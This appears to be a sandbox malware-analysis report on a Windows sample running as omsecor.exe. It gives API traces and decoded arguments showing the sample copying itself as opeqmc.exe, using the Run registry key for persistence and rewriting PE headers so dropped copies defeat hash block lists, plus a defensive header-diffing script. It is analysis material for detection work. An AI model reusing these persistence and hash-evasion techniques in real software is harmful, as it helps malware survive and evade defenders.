Note: the command line names C:\Windows\System32\omsecor.exe while the image actually runs from C:\Windows\SysWOW64\omsecor.exe. That is WOW64 file system redirection: when a 32-bit process opens, writes or executes a path under System32, Windows maps it to SysWOW64, so hunting for the file under System32 on a 64-bit host will miss it. This copy and the one in AppData\Roaming (Target ID 2) are the same 82'768 bytes as the submitted sample but carry MD5s (1FB6..., DCC8...) that differ from each other and from the sample's 44A8..., so a block list keyed on the submitted sample's hash will not match the files it drops.

Target ID: 8
Start time: 11:22:58
Start date: 01/11/2024
Path: C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\omsecor.exe /nomove
Imagebase: 0x400000
File size: 82'768 bytes
MD5 hash: 1FB6FB78751B952FE1D6BEBA89C93830
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


Execution Graph

Execution Coverage:2.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:11.9%
Total number of Nodes:1144
Total number of Limit Nodes:6
execution_graph: [serialized node and edge data for the interactive Execution Graph viewer, not readable as text. Each entry is a node id, the code address it represents and, where the node is an API call, the API name; the remaining entries are node-to-node edges. APIs named in the graph include PathCombineW, FindFirstFileW, FindNextFileW, PathMatchSpecW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, GetModuleFileNameW, CopyFileW, CreateProcessW, CreateThread, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetSetPerSiteCookieDecisionW, WriteFile, DeleteFileW, GetPrivateProfileStringW, SHGetFolderPathW, ExpandEnvironmentStringsW, VirtualAlloc, HeapCreate, IsDebuggerPresent, SetUnhandledExceptionFilter, Sleep, GetTickCount and SysAllocString/SysFreeString.]
6760->6757 6762 403a64 6761->6762 6761->6770 6763 403ac8 StrStrIW 6762->6763 6768 403ba9 6762->6768 6771 40c3f9 wvnsprintfW 6762->6771 6772 40c00b 3 API calls 6762->6772 6763->6762 6764 403add StrStrIW 6763->6764 6764->6762 6765 403af2 GetPrivateProfileStringW 6764->6765 6765->6762 6766 403b09 GetPrivateProfileStringW 6765->6766 6766->6762 6767 403b26 GetPrivateProfileStringW 6766->6767 6767->6762 6769 40be3a HeapFree 6768->6769 6769->6770 6770->6760 6771->6762 6772->6762 6774 4039b7 6773->6774 6775 408248 8 API calls 6774->6775 6776 4039e5 6775->6776 6776->6639 6777->6678 6779 40856f 6778->6779 6781 408585 6778->6781 6780 40845d 2 API calls 6779->6780 6780->6781 6781->6691 6783 409e01 6782->6783 6795 40beea 6783->6795 6787 409eb1 HttpOpenRequestW 6788 409ead 6787->6788 6789 409ecf HttpSendRequestW 6787->6789 6788->6727 6790 40be3a HeapFree 6789->6790 6791 409eea 6790->6791 6791->6788 6792 409eef InternetReadFile 6791->6792 6792->6788 6793 409f0c 6792->6793 6803 40bf35 6793->6803 6796 40bef4 6795->6796 6807 40beb4 6796->6807 6799 409e3e InternetConnectW 6799->6787 6799->6788 6801 40bf1c 6801->6799 6802 40beb4 WideCharToMultiByte 6801->6802 6802->6799 6804 40bf3a 6803->6804 6805 40bf3f MultiByteToWideChar 6803->6805 6804->6805 6806 40bf58 6805->6806 6806->6788 6808 40bec3 WideCharToMultiByte 6807->6808 6809 40bebe 6807->6809 6810 40bedd 6808->6810 6809->6808 6810->6799 6811 40be27 HeapAlloc 6810->6811 6811->6801 6989 40d2ac 6990 40d2ca 6989->6990 6992 40d378 __except_handler3 6989->6992 6991 40d790 __except_handler3 2 API calls 6990->6991 6993 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6991->6993 6993->6992 6994 40d110 __except_handler3 RtlUnwind 6993->6994 6994->6993 6995 402cad 6996 406c77 3 API calls 6995->6996 6997 402cc3 6996->6997 6998 406cb5 GetVersionExW 6997->6998 6999 402cc8 6998->6999 7000 40a8f9 34 API calls 6999->7000 7001 402cdb 7000->7001 7002 40267a 122 API calls 7001->7002 7003 402d00 7002->7003 7004 409c6f SysFreeString 
7003->7004 7005 402d08 7004->7005 7006 4032af ExitProcess 7011 402c32 7012 40267a 122 API calls 7011->7012 7013 402c56 7012->7013 7014 409c6f SysFreeString 7013->7014 7015 402c5e 7014->7015 6812 402df3 6813 406c77 3 API calls 6812->6813 6814 402e08 6813->6814 6815 406cb5 GetVersionExW 6814->6815 6816 402e0d 6815->6816 6817 40a8f9 34 API calls 6816->6817 6818 402e20 6817->6818 6819 40267a 122 API calls 6818->6819 6820 402e39 6819->6820 7016 4094b6 7017 4094c9 7016->7017 7018 4094cd 7017->7018 7019 4094f3 CharLowerW CharLowerW 7017->7019 7020 4094e3 SysFreeString 7017->7020 7022 409560 7019->7022 7024 409512 7019->7024 7021 40957e 7020->7021 7023 40956f SysFreeString SysFreeString 7022->7023 7023->7021 7024->7022 7024->7023 7025 40953a CharLowerW 7024->7025 7026 409544 7025->7026 7027 40956a SysFreeString 7026->7027 7027->7023 7028 402db7 7029 40267a 122 API calls 7028->7029 7030 402dd1 7029->7030 7031 40183a 7032 401854 7031->7032 7033 408091 3 API calls 7032->7033 7036 401958 7032->7036 7034 40194a 7033->7034 7035 408091 3 API calls 7034->7035 7035->7036 7039 402e3e 7049 402e4d 7039->7049 7040 40327c 7041 402eb7 GetModuleFileNameW 7042 402ed6 GetCurrentDirectoryW 7041->7042 7041->7049 7042->7049 7043 402f2a GetLastError 7044 40a786 35 API calls 7043->7044 7044->7049 7045 403251 GetLastError 7045->7049 7046 403237 GetLastError 7046->7049 7047 40a786 35 API calls 7047->7049 7048 407552 Sleep 7048->7049 7049->7040 7049->7041 7049->7043 7049->7045 7049->7046 7049->7047 7049->7048 7050 40253c 50 API calls 7049->7050 7050->7049 7062 403bbf 7063 40821c PathCombineW 7062->7063 7064 403bdf 7063->7064 7065 403bf9 7064->7065 7066 403bfe 7064->7066 7067 403bee 7064->7067 7069 4039ea 12 API calls 7066->7069 7068 4039a3 8 API calls 7067->7068 7068->7065 7069->7065

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
• CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
• GetFileSize.KERNEL32(?,00000000), ref: 0040762E
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
• RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
• ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
• WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
• SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
• ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
• SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
• ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
• SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
• WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
• CloseHandle.KERNELBASE(?), ref: 00407714
• CloseHandle.KERNEL32(?), ref: 00407719
Decoded: the first CreateFileW opens the source for reading (dwDesiredAccess 80000000 = GENERIC_READ, dwShareMode 00000001 = FILE_SHARE_READ, dwCreationDisposition 00000003 = OPEN_EXISTING); the second opens the destination with C0000000 = GENERIC_READ | GENERIC_WRITE, no sharing and 00000002 = CREATE_ALWAYS, so an existing destination file is overwritten. The routine allocates a heap buffer right after GetFileSize, copies the file with one ReadFile / WriteFile pair, then rewinds (SetFilePointer to offset 0) and reads 00000040 bytes, which is sizeof(IMAGE_DOS_HEADER), seeks again and reads 000000F8 bytes, which is sizeof(IMAGE_NT_HEADERS32), seeks a third time and writes 000000F8 bytes back. That is a rewrite of the PE headers of the copy; which fields inside the 248-byte block are changed is not visible from the API trace.
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
• String ID:
• API String ID: 2296163861-0
• Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
• Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
• Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
• Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
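The following script is an added example for analysts triaging this routine; it is not code from the sample or from Joe Sandbox. It reproduces the same read pattern on the host side (0x40 bytes of IMAGE_DOS_HEADER, follow e_lfanew, 0xF8 bytes of IMAGE_NT_HEADERS32) and reports which header fields differ between a source file and its rewritten copy, which is the first question to ask of the dropped executable. Its input is a constructed minimal PE32 header, not the sample, and since the report does not show which fields the sample modifies, the demo patches TimeDateStamp and CheckSum purely for illustration.

```python
import struct
from typing import Dict, Tuple

# Added example, not code from the sample or the report. It reproduces, on the analyst's side,
# the read pattern seen at 004076A1/004076C5: 0x40 bytes (IMAGE_DOS_HEADER), follow e_lfanew,
# then 0xF8 bytes (IMAGE_NT_HEADERS32), and diffs that block between two files.
DOS_HEADER_SIZE = 0x40       # sizeof(IMAGE_DOS_HEADER)
NT_HEADERS32_SIZE = 0xF8     # sizeof(IMAGE_NT_HEADERS32)
E_LFANEW_OFFSET = 0x3C       # IMAGE_DOS_HEADER.e_lfanew

# (field name, struct format) for IMAGE_NT_HEADERS32 up to NumberOfRvaAndSizes;
# the 16 IMAGE_DATA_DIRECTORY entries (16 * 8 bytes) follow and complete the 0xF8 bytes.
NT_FIELDS = [
    ("Signature", "<I"),
    ("Machine", "<H"), ("NumberOfSections", "<H"), ("TimeDateStamp", "<I"),
    ("PointerToSymbolTable", "<I"), ("NumberOfSymbols", "<I"),
    ("SizeOfOptionalHeader", "<H"), ("Characteristics", "<H"),
    ("Magic", "<H"), ("MajorLinkerVersion", "<B"), ("MinorLinkerVersion", "<B"),
    ("SizeOfCode", "<I"), ("SizeOfInitializedData", "<I"), ("SizeOfUninitializedData", "<I"),
    ("AddressOfEntryPoint", "<I"), ("BaseOfCode", "<I"), ("BaseOfData", "<I"),
    ("ImageBase", "<I"), ("SectionAlignment", "<I"), ("FileAlignment", "<I"),
    ("MajorOperatingSystemVersion", "<H"), ("MinorOperatingSystemVersion", "<H"),
    ("MajorImageVersion", "<H"), ("MinorImageVersion", "<H"),
    ("MajorSubsystemVersion", "<H"), ("MinorSubsystemVersion", "<H"),
    ("Win32VersionValue", "<I"), ("SizeOfImage", "<I"), ("SizeOfHeaders", "<I"),
    ("CheckSum", "<I"), ("Subsystem", "<H"), ("DllCharacteristics", "<H"),
    ("SizeOfStackReserve", "<I"), ("SizeOfStackCommit", "<I"),
    ("SizeOfHeapReserve", "<I"), ("SizeOfHeapCommit", "<I"),
    ("LoaderFlags", "<I"), ("NumberOfRvaAndSizes", "<I"),
]


def read_nt_headers(pe: bytes) -> bytes:
    """Return the 0xF8-byte IMAGE_NT_HEADERS32 block, located the same way the sample does."""
    dos = pe[:DOS_HEADER_SIZE]
    if len(dos) < DOS_HEADER_SIZE or dos[:2] != b"MZ":
        raise ValueError("not a PE file: missing or short IMAGE_DOS_HEADER")
    e_lfanew = struct.unpack_from("<I", dos, E_LFANEW_OFFSET)[0]
    nt = pe[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(nt) != NT_HEADERS32_SIZE or nt[:4] != b"PE\0\0":
        raise ValueError("truncated or invalid IMAGE_NT_HEADERS32 at e_lfanew")
    return nt


def parse_nt_headers(nt: bytes) -> Dict[str, int]:
    """Decode the 0xF8-byte block into named PE32 fields (little-endian, packed)."""
    fields: Dict[str, int] = {}
    offset = 0
    for name, fmt in NT_FIELDS:
        fields[name] = struct.unpack_from(fmt, nt, offset)[0]
        offset += struct.calcsize(fmt)
    for i in range(16):
        va, size = struct.unpack_from("<II", nt, offset)
        fields[f"DataDirectory[{i}].VirtualAddress"] = va
        fields[f"DataDirectory[{i}].Size"] = size
        offset += 8
    assert offset == NT_HEADERS32_SIZE
    return fields


def diff_nt_headers(original: bytes, rewritten: bytes) -> Dict[str, Tuple[int, int]]:
    """Fields of the NT headers that differ between the source file and its rewritten copy."""
    before = parse_nt_headers(read_nt_headers(original))
    after = parse_nt_headers(read_nt_headers(rewritten))
    return {k: (before[k], after[k]) for k in before if before[k] != after[k]}


def build_sample_pe(timestamp: int, checksum: int) -> bytes:
    """Constructed minimal PE32 header (no sections, no code) used only as demo input; not the sample."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, DOS_HEADER_SIZE)  # NT headers follow the DOS header
    nt = bytearray(NT_HEADERS32_SIZE)
    nt[:4] = b"PE\0\0"
    # IMAGE_FILE_HEADER: i386, 0 sections, timestamp, no symbols, 0xE0-byte optional header, EXE|32BIT
    struct.pack_into("<HHIIIHH", nt, 4, 0x014C, 0, timestamp, 0, 0, 0xE0, 0x0102)
    opt = 4 + 20                                           # start of IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", nt, opt, 0x10B)                 # Magic: PE32
    struct.pack_into("<I", nt, opt + 16, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", nt, opt + 28, 0x00400000)       # ImageBase
    struct.pack_into("<I", nt, opt + 64, checksum)         # CheckSum
    struct.pack_into("<I", nt, opt + 92, 16)               # NumberOfRvaAndSizes
    return bytes(dos) + bytes(nt)


if __name__ == "__main__":
    # Illustrative patch only: the report does not show which fields the sample rewrites.
    original = build_sample_pe(timestamp=0x5F000000, checksum=0)
    rewritten = build_sample_pe(timestamp=0x66000000, checksum=0x1234)
    for name, (old, new) in diff_nt_headers(original, rewritten).items():
        print(f"{name}: {old:#010x} -> {new:#010x}")
```

On real files, pass the bytes of the submitted sample and of the dropped copy to diff_nt_headers; a non-empty result that touches AddressOfEntryPoint or a data directory means the copy is functionally different, while changes limited to TimeDateStamp or CheckSum only defeat hash matching. The script handles PE32 only; a PE32+ sample would need the 0x108-byte IMAGE_NT_HEADERS64 layout, which the 0xF8 read in this routine rules out.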

Control-flow Graph
control_flow_graph (edge list): 40abd9-40abf5 call 40ac20 -> 40abf7-40ac0c FindFirstFileW -> 40ac0e-40ac18 FindClose -> 40ac1c-40ac1f; both 40abd9-40abf5 and 40abf7-40ac0c also branch directly to 40ac1a -> 40ac1c-40ac1f.
APIs
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
• FindClose.KERNEL32(00000000), ref: 0040AC0F
Decoded: the subcall opens the Run key first under HKEY_CURRENT_USER (80000001) and then under HKEY_LOCAL_MACHINE (80000002), both with samDesired 00000001 = KEY_QUERY_VALUE, i.e. a read-only check of the autostart entry. FindFirstFileW whose handle goes straight to FindClose is the usual file-exists idiom; nothing from the find data is consumed.
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: FindOpen$CloseFileFirst
• String ID:
• API String ID: 3155378417-0
• Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
• Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
• Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
• Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
• GetLastError.KERNEL32(00000004), ref: 0040B3CA
• Sleep.KERNEL32(00002710), ref: 0040B3F7
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
• CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
• ExitProcess.KERNEL32 ref: 0040B44D
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• GetLastError.KERNEL32(00000004), ref: 0040B48D
• GetLastError.KERNEL32(00000004), ref: 0040B49A
• ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
• GetLastError.KERNEL32(00000004), ref: 0040B500
Decoded: GetModuleFileNameW(00000000, buf, 00000400) resolves the sample's own path; Sleep(00002710) waits 10,000 ms (10 s); CopyFileW(?,?,00000000) passes bFailIfExists = FALSE, so an existing copy at the destination is overwritten; the RegCreateKeyExW subcall asks for samDesired 00020006 = KEY_WRITE, and its caller context at 00406AD3 shows HKEY_CURRENT_USER (80000001) with AppEvents\Schemes\Apps\Explorer\Navigating\.current; the RegOpenKeyExW subcall checks the Run key under HKEY_CURRENT_USER and then HKEY_LOCAL_MACHINE with KEY_QUERY_VALUE. Read with the referenced strings, the GetModuleFileNameW -> CopyFileW -> ExitProcess sequence is the install step that places a copy named opeqmc.exe and ties it to the Run key. That /nomove is the command-line switch which skips this step on a later launch is an inference from the strings and stack arguments, not something the trace shows directly.
Strings
• /nomove
• IueiOod
• SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• opeqmc.exe
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
• String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
• API String ID: 3692109554-477663111
• Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
• Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
• Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
• Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

Control-flow Graph

Control-flow graph (rendered figure not preserved): basic blocks 40ac20-40ac92; calls RegOpenKeyExW at two sites and subroutine 4069c0 at two sites.
APIs
• RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
• RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
  • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
  • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Open$CloseQueryValue
• String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• API String ID: 3546245721-4228964922
• Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
• Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
• Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
• Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Control-flow Graph

APIs
• GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
• GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
• CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
• CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: CharLower$CommandFileLineModuleName
• String ID: /nomove
• API String ID: 1338073227-1111986840
• Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
• Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
• Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
• Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Control-flow Graph

Control-flow graph (rendered figure not preserved): basic blocks 407727-4077ee; calls GetModuleFileNameW, ExpandEnvironmentStringsW, GetLastError (two sites) and subroutines 40d5b0, 4075d4 (two sites) and 40a786.
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,76230900,00000400,00000000,0040B4B3,00000000), ref: 00407744
• ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
• GetLastError.KERNEL32(00000004), ref: 004077A9
  • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
  • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
• String ID:
• API String ID: 1536607067-0
• Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
• Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
• Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
• Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Control-flow Graph

Control-flow graph (rendered figure not preserved): single basic block 4077f0-407829; calls subroutine 40d530 and CreateProcessW.
APIs
• _memset.LIBCMT ref: 00407800
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: CreateProcess_memset
• String ID:
• API String ID: 1177741608-0
• Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
• Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
• Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
• Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

Control-flow Graph

Control-flow graph (rendered figure not preserved): single basic block 4069c0-4069fc; calls RegQueryValueExW and RegCloseKey.
APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
• RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
• Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
• Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
• Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Control-flow Graph (basic blocks as address ranges, edges as source->target; the executed/not-executed colouring of the rendered graph is not reproduced in text)
control_flow_graph 262 4039ea-403a14 HeapAlloc 263 403bba-403bbe 262->263 264 403a1a-403a30 GetPrivateProfileStringW 262->264 265 403bb3-403bb9 call 40be3a 264->265 266 403a36-403a42 call 40c475 264->266 265->263 266->265 271 403a48-403a5e HeapAlloc 266->271 271->265 272 403a64-403ac3 call 405511 * 5 271->272 283 403ac8-403ad7 StrStrIW 272->283 284 403b93-403ba3 call 40c495 283->284 285 403add-403aec StrStrIW 283->285 284->283 291 403ba9-403bb2 call 40be3a 284->291 285->284 286 403af2-403b03 GetPrivateProfileStringW 285->286 286->284 288 403b09-403b24 GetPrivateProfileStringW 286->288 288->284 290 403b26-403b3a GetPrivateProfileStringW 288->290 290->284 292 403b3c-403b47 call 403877 290->292 291->265 292->284 297 403b49-403b7b call 405511 call 40c3f9 292->297 302 403b90 297->302 303 403b7d-403b8b call 40c00b 297->303 302->284 303->302 306 403b8d 303->306 306->302
APIs
